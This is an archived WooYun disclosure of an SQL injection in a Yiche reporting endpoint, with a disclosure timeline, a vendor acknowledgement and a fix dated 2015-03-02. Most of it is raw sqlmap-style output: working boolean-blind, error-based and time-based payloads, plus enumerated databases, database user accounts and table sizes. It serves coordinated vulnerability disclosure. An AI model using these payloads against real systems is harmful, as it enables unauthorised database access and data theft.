WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
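2015-02-22: Details reported to the vendor; awaiting vendor handling
2015-02-22: Vendor has confirmed; details disclosed to the vendor only
2015-03-04: Details disclosed to core white hats and experts in related fields
2015-03-14: Details disclosed to regular white hats
2015-03-24: Details disclosed to trainee white hats
2015-04-13: Details disclosed to the public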
Wishing you a prosperous New Year, now hand over the red envelope.
Injection point: http://dmp.op.cig.com.cn/report/area/index?t=1&deep=
Parameter: t=1
---
Parameter: t (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: t=1' AND 4647=4647 AND 'cPDg'='cPDg&deep=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: t=1' AND (SELECT 9734 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (CASE WHEN (9734=9734) THEN 1 ELSE 0 END)),0x717a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'khji'='khji&deep=

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: t=1' AND SLEEP(5) AND 'buEq'='buEq&deep=
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [66]:
[*] bitauto_data_stat
[*] bitsmart
[*] carsv2222
[*] cheyisou
[*] cig_achievement
[*] cig_ad_sys_t
[*] cig_adsense
[*] cig_adsense_report
[*] cig_audience_package
[*] cig_blog_department
[*] cig_blog_easyad
[*] cig_crm
[*] cig_crmv2
[*] cig_institution
[*] cig_jiesuan
[*] cig_luxgen
[*] cig_mrm
[*] cig_mst
[*] cig_op
[*] cig_opv2
[*] cig_survey
[*] cig_tracking_report
[*] cig_urlanalytic
[*] cigdc_attribute
[*] cigdc_buffer
[*] cigdc_dealer
[*] cigdc_logmanage
[*] cigdc_monitor
[*] cigdc_page
[*] cigdc_pool
[*] cigdc_private_package
[*] cigdc_report
[*] cigdc_server
[*] cigdc_system
[*] cigdc_tagmanager
[*] cigdc_tagmanager_report
[*] cigdc_tagmanager_url
[*] cigdc_tagmanager_url_result
[*] cigdc_task
[*] cigdc_yiche
[*] cigdc_yiche_tuisong
[*] diamond
[*] diamond-production
[*] easyad_buffer
[*] easyad_mattar
[*] easyad_monitor
[*] easyad_report
[*] easyad_system
[*] easyad_task
[*] iBitAutotemp
[*] information_schema
[*] innodb
[*] mysql
[*] performance_schema
[*] test
[*] testdb
[*] visitor_bqcx
[*] web_db
[*] yiche_ad_sys
[*] yiche_ad_sys_t
[*] yiche_auto_index
[*] yiche_dad
[*] yiche_dad_report
[*] yiche_dad_t
[*] yiche_domainuser
[*] yiche_tag
[*] ''@'AD_DB01'
[*] ''@'localhost'
[*] 'audience_package'@'%'
[*] 'auto_index_car'@'%'
[*] 'auto_index_data'@'%'
[*] 'auto_index_web'@'%'
[*] 'bitsmart'@'%'
[*] 'cig_ad_sys_t'@'%'
[*] 'cig_adsense'@'%'
[*] 'cig_adsense_car'@'%'
[*] 'cig_adsense_repo'@'%'
[*] 'cig_crmv2'@'%'
[*] 'cigdc_logmanage'@'%'
[*] 'cigdc_server'@'%'
[*] 'cigdc_tagmanager'@'%'
[*] 'cigdc_task'@'%'
[*] 'cigdc_yiche'@'%'
[*] 'cigdc_yiche_api'@'%'
[*] 'dad_manager'@'%'
[*] 'dad_report_web'@'%'
[*] 'dad_test'@'%'
[*] 'easyad_system'@'%'
[*] 'easyad_xiaol'@'%'
[*] 'mlmuser'@'%'
[*] 'opv2'@'%'
[*] 'private_package'@'%'
[*] 'Repluser'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.141'
[*] 'root'@'::1'
[*] 'root'@'AD_DB01'
[*] 'root'@'localhost'
[*] 'user_cig_opv2'@'%'
[*] 'user_easyad_syst'@'%'
[*] 'web_db'@'192.168.1.141'
[*] 'yiche_ad_sys'@'%'
[*] 'yiche_ad_sys_t'@'%'
[*] 'yiche_dad_report'@'%'
[*] 'yiche_tag'@'%'
Database: cigdc_yiche
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| StyleD                  | 3864110 |
| StylePropertyValue      | 3725077 |
| StyleJoinColor          | 96574   |
| entitylogitem           | 88680   |
| dealer                  | 53512   |
| dealerMap               | 42141   |
| dealerBrand             | 41561   |
| Style                   | 36029   |
| Style2                  | 36029   |
| a_style_to_model        | 35728   |
| tbl                     | 34109   |
| WhiteCoverImages        | 19194   |
| ModelColor              | 12132   |
| yearpropertyvalue       | 7588    |
| Model                   | 2599    |
| a_model_to_brand        | 2582    |
| a_model_to_make         | 2582    |
| cx_model                | 1947    |
| area                    | 1891    |
| ModelAutohome           | 1631    |
| yichebaa_brandforumlist | 852     |
| cx_make                 | 639     |
| StyleProperty           | 420     |
| cx_masterbrand          | 397     |
| Make                    | 293     |
| a_make_to_brand         | 287     |
| tag_tree                | 264     |
| MasterBrand             | 254     |
| Manufacturer            | 241     |
| temp                    | 53      |
| StylePropertyGroup      | 31      |
| cx_url_rule             | 24      |
| ModelLevel              | 19      |
| Country                 | 15      |
| tag_path                | 14      |
| yichebaa                | 13      |
| emaillogreceiver        | 11      |
| path_car                | 11      |
| `Use`                   | 10      |
| ModelBodyForm           | 10      |
| SyncDataReceiver        | 4       |
+-------------------------+---------+
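You know what to do.
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-02-22 17:09
Thank you very much for your help to Yiche; we will handle this as soon as possible.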
2015-03-02: Fixed. Thank you very much for your support of Yiche.